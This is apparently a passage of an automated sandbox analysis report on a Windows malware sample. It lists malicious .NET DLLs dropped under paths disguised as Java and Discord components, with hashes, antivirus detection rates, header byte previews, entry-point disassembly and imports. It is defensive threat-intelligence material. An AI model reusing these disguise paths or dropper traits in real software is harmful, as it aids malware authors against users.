                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\HBUOKBdR.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\IlqWXNCe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\QPyLHGSL.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                  C:\Users\user\Desktop\ToOuVQfl.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\XeElcNfe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                  C:\Users\user\Desktop\axSbriXt.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                  C:\Users\user\Desktop\ebskEcaT.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                  \Device\Null

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):151
                                                                                                                  Entropy (8bit):4.798936293036221
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXhRQuh8was8u6vo1/3JFyXKvj:Vx993DEUGBPFBJFy8
                                                                                                                  MD5:E9095824738BA9F9B830DC031643C809
                                                                                                                  SHA1:0CA4AA84D0399F9211DB5347740BBFB742CB7259
                                                                                                                  SHA-256:4E2A10D592FB67914A3D01E1FE5BDECFB9EF2886F05750109FB3D296989B43C5
                                                                                                                  SHA-512:25B2ACBD543C4120FC11626F3F044023739BB1507989CF723DA5C2101EE49F6DB0C133100C98126E0E43358DB79B15B97C1BFA7354745B48D74CEF8935981B4F
                                                                                                                  Malicious:false
                                                                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/01/2025 10:57:03..10:57:03, error: 0x80072746.10:57:08, error: 0x80072746.

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.473166054024146
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:1znAXdPcM5.exe
                                                                                                                  File size:2'236'943 bytes
                                                                                                                  MD5:e656db3deb4cf58570317e64607c5420
                                                                                                                  SHA1:828c7c6b815e294ee7a5bbe26af14ed3307fd4be
                                                                                                                  SHA256:71be504d45fbc0506cfd654d3d185f11774f4b2f0613ae2199a583438f989caf
                                                                                                                  SHA512:403b1f9932c9f844eaffef7370dd35cbc0bef6ed6489be5e5d24cb53a4a49bcc45b20be4307b10532fbc3e90841f18181536a92762d42ff57d33a611392203a5
                                                                                                                  SSDEEP:24576:2TbBv5rUyXVOnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFg/:IBJOM5aaeNylOhr0Skf0CulFFyh
                                                                                                                  TLSH:7CA5AE1679924F33C36416328557033D92A0DB293A22EF1F361F24D6A9177F29F722A7
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                                  File Icon

                                                                                                                  Icon Hash:1515d4d4442f2d2d

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007F9E607FC55Bh
                                                                                                                  jmp 00007F9E607FBE6Dh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F9E607EECB7h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007F9E607FF2FFh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007F9E607FBFFCh
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007F9E607FB5B9h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F9E607EEC32h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F9E607FEDB9h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F9E607FBF78h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F9E607FED9Ch
                                                                                                                  int3
                                                                                                                  jmp 00007F9E60800837h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                  PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                  RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                  RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                  RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                  RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                  RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                  RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                  RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                  RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                                                  RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                                                  RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                                                  RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                                                  RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                  RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                                                  RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                  RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                  RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                  RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                  RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                  RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                  RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                  RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                  RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                  RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                  RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                                                  RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, 